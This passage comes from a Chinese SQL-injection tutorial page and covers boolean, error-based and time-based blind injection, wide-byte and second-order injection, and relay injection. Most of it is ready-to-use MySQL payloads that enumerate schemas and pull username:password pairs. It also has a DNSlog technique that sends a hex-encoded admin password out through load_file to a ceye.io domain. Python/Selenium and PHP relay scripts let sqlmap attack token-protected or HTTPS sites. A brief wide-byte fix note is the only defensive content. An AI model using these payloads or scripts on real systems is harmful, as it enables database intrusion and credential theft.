</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>5、判断数据库字段名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and substr((select column_name from information_schema.columns where table_schema='</span>数据库名<span class="token string">' and table_name='</span>表名<span class="token string">' limit 0,1),1,1)='</span>a'<span class="token comment">--+</span>

<span class="token comment">--修改1,1前边的1~20，逐字符猜解出第一个字段的名</span>
<span class="token comment">--修改limit的0,1前边的0~20，逐个猜解每个字段</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>6、取数据</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and substr((select 字段名 from 表名 limit 0,1),1,1)='</span>a'<span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>当然如果嫌用Burp慢的话，可以自己编写脚本，修改payload就行了</p> <p>一般盲注的话都是自己写脚本比较快。</p> <h2 id="报错注入">报错注入 <a href="#报错注入" class="header-anchor">#</a></h2> <p>在SQL注入攻击过程中，服务器开启了错误回显，页面会返回错误信息，利用报错函数获取数据库数据。</p> <p>常用的MySQL报错函数</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--xpath语法错误</span>
extractvalue<span class="token punctuation">(</span><span class="token punctuation">)</span>	<span class="token comment">--查询节点内容</span>
updatexml<span class="token punctuation">(</span><span class="token punctuation">)</span>		<span class="token comment">--修改查询到的内容</span>
它们的第二个参数都要求是符合xpath语法的字符串
如果不满足要求则会报错，并且将查询结果放在报错信息里

<span class="token comment">--主键重复（duplicate entry）</span>
floor<span class="token punctuation">(</span><span class="token punctuation">)</span>			<span class="token comment">--返回小于等于该值的最大整数</span>
只要是count，rand<span class="token punctuation">(</span><span class="token punctuation">)</span>，<span class="token keyword">group</span> <span class="token keyword">by</span> 三个连用就会造成这种主键重复报错
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>1、尝试用单引号报错</strong></p> <p><strong>2、获取数据库名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>' <span class="token operator">and</span> updatexml<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span>concat<span class="token punctuation">(</span><span class="token number">0x7e</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">0x7e</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token comment">--+</span>


<span class="token comment">--0x7e是&quot;~&quot;符号的16进制，在这作为分隔符</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>3、获取表名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='</span>数据库名' <span class="token keyword">limit</span> <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">0x7e</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>4、获取字段名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='</span>数据库名<span class="token string">' and table_name='</span>表名' <span class="token keyword">limit</span> <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">0x7e</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>5、取数据</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code>' <span class="token operator">and</span> updatexml<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span>concat<span class="token punctuation">(</span><span class="token number">0x7e</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">select</span> concat<span class="token punctuation">(</span>username<span class="token punctuation">,</span><span class="token number">0x3a</span><span class="token punctuation">,</span>password<span class="token punctuation">)</span> <span class="token keyword">from</span> users <span class="token keyword">limit</span> <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">0x7e</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>其它函数payload语法：</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--extractvalue</span>
<span class="token string">' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

--floor()
'</span> <span class="token operator">and</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token number">1</span> <span class="token keyword">from</span> <span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token operator">*</span><span class="token punctuation">)</span><span class="token punctuation">,</span>concat<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>floor<span class="token punctuation">(</span>rand<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token operator">*</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">)</span>x <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token keyword">group</span> <span class="token keyword">by</span> x<span class="token punctuation">)</span>a<span class="token punctuation">)</span><span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="时间型盲注">时间型盲注 <a href="#时间型盲注" class="header-anchor">#</a></h2> <p>盲注是在SQL注入攻击过程中，服务器关闭了错误回显，单纯通过服务器返回内容的变化来判断是否存在SQL注入的方式 。</p> <p>可以用benchmark，sleep等造成延时效果的函数。</p> <p>如果benkchmark和sleep关键字被过滤了，可以让两个非常大的数据表做<a href="https://blog.csdn.net/qq_32763643/article/details/79187931" target="_blank" rel="noopener noreferrer">笛卡尔积<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>产生大量的计算从而产生时间延迟；</p> <p>或者利用复杂的正则表达式去匹配一个超长字符串来产生时间延迟。</p> <p><strong>1、利用sleep判断数据库名长度</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">' and sleep(5) and 1=1--+	页面返回不正常，延时5秒
'</span> <span class="token operator">and</span> sleep<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span> <span class="token operator">and</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">2</span><span class="token comment">--+	页面返回不正常，不延时</span>

<span class="token operator">and</span> <span class="token keyword">if</span><span class="token punctuation">(</span>length<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">&gt;</span><span class="token number">1</span><span class="token punctuation">,</span>sleep<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token comment">--if(条件表达式，真，假) --C语言的三目运算符类似</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>2、获取数据库名</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token operator">and</span> <span class="token keyword">if</span><span class="token punctuation">(</span>substr<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span><span class="token punctuation">,</span>sleep<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token comment">--+</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>具体数据以此类推即可。</p> <h3 id="时间型盲注的加速方式">时间型盲注的加速方式 <a href="#时间型盲注的加速方式" class="header-anchor">#</a></h3> <p><strong>1、Windows平台上的Mysql可以用DNSlog加速注入</strong></p> <p><strong>2、利用二分查找法</strong></p> <p>sqlmap盲注默认采用的是二分查找法</p> <blockquote><ul><li>利用 ASCII 码作为条件来查询，ASCII 码中字母范围在65~122之间</li> <li>以这个范围的中间数为条件，判断payload中传入的 ASCII 码是否大于这个中间数</li> <li>如果大于，就往中间数~122这块查找。反之亦然~</li></ul></blockquote> <h1 id="注入技巧">注入技巧 <a href="#注入技巧" class="header-anchor">#</a></h1> <h2 id="dnslog盲注详解">DNSlog盲注详解 <a href="#dnslog盲注详解" class="header-anchor">#</a></h2> <p>DNS在解析的时候会留下日志，通过读取多级域名的解析日志，获取请求信息；</p> <p>DNSlog就是记录用户访问网站域名时，记录<code>DNS</code>和对应的IP的转换访问日志；</p> <p>MySQL Load_File()函数可以发起请求，使用Dnslog接收请求，获取数据；</p> <p>通过SQL执行后，将内容输出到DNSlog中记录起来，然后我们可以在DNSlog平台查询回显数据</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span>load_file<span class="token punctuation">(</span>CONCAT<span class="token punctuation">(</span><span class="token string">'\\'</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">SELECT</span> hex<span class="token punctuation">(</span>pass<span class="token punctuation">)</span> <span class="token keyword">FROM</span> <span class="token keyword">user</span> <span class="token keyword">WHERE</span> name<span class="token operator">=</span><span class="token string">'admin'</span> <span class="token keyword">LIMIT</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">'.mysql.wintrysec.ceye.io\abc'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment">--Hex编码的目的是减少干扰，域名有一定的规范，有些特殊字符不能带入</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><blockquote><p>注意：load_file()只能在windows平台上才能发起请求，linux下做dnslog攻击是不行的</p> <p>因为UNC通用命名规范， \\server\share_name</p> <p>上边 CONCAT 应该写四个反斜杠 \，因为最后会被转义成两个</p> <p>因为Linux没有遵守UNC，所以当MySQL处于Linux系统中的时候，是不能使用这种方式外带数据的</p></blockquote> <blockquote><p>MySQL数据库配置中要设置secure_file_priv为空,才能完整的去请求DNS</p> <p>secure-file-priv参数是用来限制 LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的</p> <ul><li>ure_file_priv的值为null ，表示限制mysqld 不允许导入|导出</li> <li>当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下</li> <li>当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制</li></ul></blockquote> <p>在时间型盲注中用DNSlog加速注入</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token string">'and if((SELECT LOAD_FILE(CONCAT('</span>\\\\'<span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">SELECT</span> hex<span class="token punctuation">(</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">'.xxx.ceye.io\\abc'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span>sleep<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">23</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><a href="https://www.anquanke.com/post/id/98096" target="_blank" rel="noopener noreferrer">DNSlog在SQL注入中的实战<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h2 id="宽字节注入-过滤了单引号">宽字节注入(过滤了单引号) <a href="#宽字节注入-过滤了单引号" class="header-anchor">#</a></h2> <blockquote><p>在数据库中使用了宽字符集(GBK，GB2312等)，除了英文都是一个字符占两字节；</p> <p>MySQL在使用GBK编码的时候，会认为两个字符为一个汉字(ascii&gt;128才能达到汉字范围)；</p> <p>在PHP中使用<code>addslashes</code>函数的时候，会对单引号%27进行转义，在前边加一个反斜杠”\”，变成%5c%27;</p> <p>可以在前边添加%df,形成%df%5c%27，而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;</p> <p>%5c被吃掉了，单引号由此逃逸可以用来闭合语句。</p></blockquote> <p>使用PHP函数<code>iconv('utf-8','gbk',$_GET['id'])</code>,也可能导致注入产生</p> <p><strong>修复建议：</strong></p> <blockquote><p>（1）使用mysqli_set_charset(GBK)指定字符集</p> <p>（2）使用mysqli_real_escape_string进行转义</p></blockquote> <h2 id="二阶注入">二阶注入 <a href="#二阶注入" class="header-anchor">#</a></h2> <blockquote><p>当数据首次插入到数据库中时，许多应用程序能够安全处理这些数据；addslashes() 等字符转义函数。</p> <p>一旦数据存储在数据库中，随后应用程序本身或其它后端进程可能会以危险的方式处理这些数据。</p> <p>许多这类应用并不像面向因特网的主要应用程序一样安全，却拥有较高权限的数据库账户。</p></blockquote> <p>第一次HTTP请求是精心构造的，为第二次HTTP请求触发漏洞做准备。</p> <p><a href="https://www.freebuf.com/articles/web/142963.html" target="_blank" rel="noopener noreferrer">使用Burp和自定义Sqlmap Tamper利用二次注入漏洞<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h2 id="中转注入">中转注入 <a href="#中转注入" class="header-anchor">#</a></h2> <blockquote><p>当网站做了token保护或js前端加密的情况下；</p> <p>对于这些站点当手工发现了注入点，但并不适用于用sqlmap等工具跑，可以做中转注入；</p> <p>本地起个Server，然后用sqlmap扫这个server，Server接收到payload后加到表单中提交。</p></blockquote> <p><strong>Python+selenium做中转注入</strong></p> <div class="language-python line-numbers-mode"><pre class="language-python"><code><span class="token keyword">from</span> flask <span class="token keyword">import</span> Flask
<span class="token keyword">from</span> flask <span class="token keyword">import</span> request
<span class="token keyword">from</span> selenium <span class="token keyword">import</span> webdriver
driver_path <span class="token operator">=</span> <span class="token string">&quot;C:/Users/Administrator/AppData/Local/Programs/Python/Python37/Lib/site-packages/selenium/webdriver/chrome/chromedriver.exe&quot;</span>
chrome <span class="token operator">=</span> webdriver<span class="token punctuation">.</span>Chrome<span class="token punctuation">(</span>driver_path<span class="token punctuation">)</span>
chrome<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">&quot;http://127.0.0.1&quot;</span><span class="token punctuation">)</span><span class="token comment">#目标注入点</span>
app <span class="token operator">=</span> Flask<span class="token punctuation">(</span>__name__<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">send</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span><span class="token punctuation">:</span>
<span class="token comment">#起到中转payload效果。</span>
  chrome<span class="token punctuation">.</span>find_element_by_id<span class="token punctuation">(</span><span class="token string">&quot;username&quot;</span><span class="token punctuation">)</span><span class="token punctuation">.</span>send_keys<span class="token punctuation">(</span>payload<span class="token punctuation">)</span> <span class="token comment">#把payload填到有注入点的地方</span>
  chrome<span class="token punctuation">.</span>find_element_by_id<span class="token punctuation">(</span><span class="token string">&quot;password&quot;</span><span class="token punctuation">)</span><span class="token punctuation">.</span>send_keys<span class="token punctuation">(</span><span class="token string">&quot;aaaa&quot;</span><span class="token punctuation">)</span>
  chrome<span class="token punctuation">.</span>find_element_by_id<span class="token punctuation">(</span><span class="token string">&quot;submit&quot;</span><span class="token punctuation">)</span><span class="token punctuation">.</span>click<span class="token punctuation">(</span><span class="token punctuation">)</span>
  <span class="token keyword">return</span> <span class="token string">&quot;plase see flask server!&quot;</span> <span class="token comment">#随便返回一下不重要</span>

<span class="token decorator annotation punctuation">@app<span class="token punctuation">.</span>route</span><span class="token punctuation">(</span><span class="token string">'/'</span><span class="token punctuation">)</span>
<span class="token keyword">def</span> <span class="token function">index</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token comment"># 接收sqlmap传递过来的payload</span>
    payload <span class="token operator">=</span> request<span class="token punctuation">.</span>args<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">&quot;payload&quot;</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">&quot;__main__&quot;</span><span class="token punctuation">:</span>
    app<span class="token punctuation">.</span>run<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br></div></div><p><strong>用PHP做中转注入</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">//先开启php.ini 中的extension=php_curl.dll</span>
<span class="token function">set_time_limit</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$curl</span> <span class="token operator">=</span> <span class="token function">curl_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//初始化curl</span>
<span class="token variable">$id</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'id'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token comment">//替换id空格和=</span>
<span class="token variable">$id</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot; &quot;</span><span class="token punctuation">,</span><span class="token double-quoted-string string">&quot;%20&quot;</span><span class="token punctuation">,</span><span class="token variable">$id</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$id</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot;=&quot;</span><span class="token punctuation">,</span><span class="token double-quoted-string string">&quot;%3D&quot;</span><span class="token punctuation">,</span><span class="token variable">$id</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$url</span> <span class="token operator">=</span> <span class="token double-quoted-string string">&quot;http://xxx.com/aaa.php&quot;</span><span class="token punctuation">;</span>
<span class="token comment">// 设置目标URL  </span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$curl</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_URL</span><span class="token punctuation">,</span> <span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>     
<span class="token comment">// 设置header   </span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$curl</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_HEADER</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>    
<span class="token comment">// 设置cURL 参数，要求结果保存到字符串中还是输出到屏幕上。   </span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$curl</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_RETURNTRANSFER</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>    
<span class="token comment">// 运行cURL，请求网页   </span>
<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token function">curl_exec</span><span class="token punctuation">(</span><span class="token variable">$curl</span><span class="token punctuation">)</span><span class="token punctuation">;</span>   
<span class="token comment">// 关闭URL请求   </span>
<span class="token function">curl_close</span><span class="token punctuation">(</span><span class="token variable">$curl</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br></div></div><p><strong>sqlmap不能忽略证书，跑不了https的网站</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$url</span> <span class="token operator">=</span> <span class="token double-quoted-string string">&quot;https://x.x.x.x/aaa.php&quot;</span><span class="token punctuation">;</span>
<span class="token variable">$sql</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span>arg<span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$s</span> <span class="token operator">=</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token variable">$sql</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$params</span> <span class="token operator">=</span> <span class="token double-quoted-string string">&quot;email=<span class="token interpolation"><span class="token variable">$s</span></span>&amp;password=aa&quot;</span><span class="token punctuation">;</span>

<span class="token comment">//写出到文件分析.</span>
<span class="token variable">$fp</span><span class="token operator">=</span><span class="token function">fopen</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'result.txt'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'a'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'Params:'</span><span class="token punctuation">.</span><span class="token variable">$params</span><span class="token punctuation">.</span><span class="token double-quoted-string string">&quot;\n&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$fp</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$ch</span> <span class="token operator">=</span> <span class="token function">curl_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_URL</span><span class="token punctuation">,</span> <span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_SSL_VERIFYPEER</span><span class="token punctuation">,</span> <span class="token boolean constant">FALSE</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// https请求 不验证证书和hosts</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_SSL_VERIFYHOST</span><span class="token punctuation">,</span> <span class="token boolean constant">FALSE</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_RETURNTRANSFER</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_HEADER</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_USERAGENT</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_TIMEOUT</span><span class="token punctuation">,</span> <span class="token number">15</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_POST</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>    <span class="token comment">// post 提交方式</span>
<span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_POSTFIELDS</span><span class="token punctuation">,</span> <span class="token variable">$params</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  
<span class="token variable">$output</span> <span class="token operator">=</span> <span class="token function">curl_exec</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">curl_close</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$output</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token operator">==</span><span class="token number">2846</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">echo</span> <span class="token double-quoted-string string">&quot;1&quot;</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>
    <span class="token keyword">echo</span> <span class="token double-quoted-string string">&quot;2&quot;</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
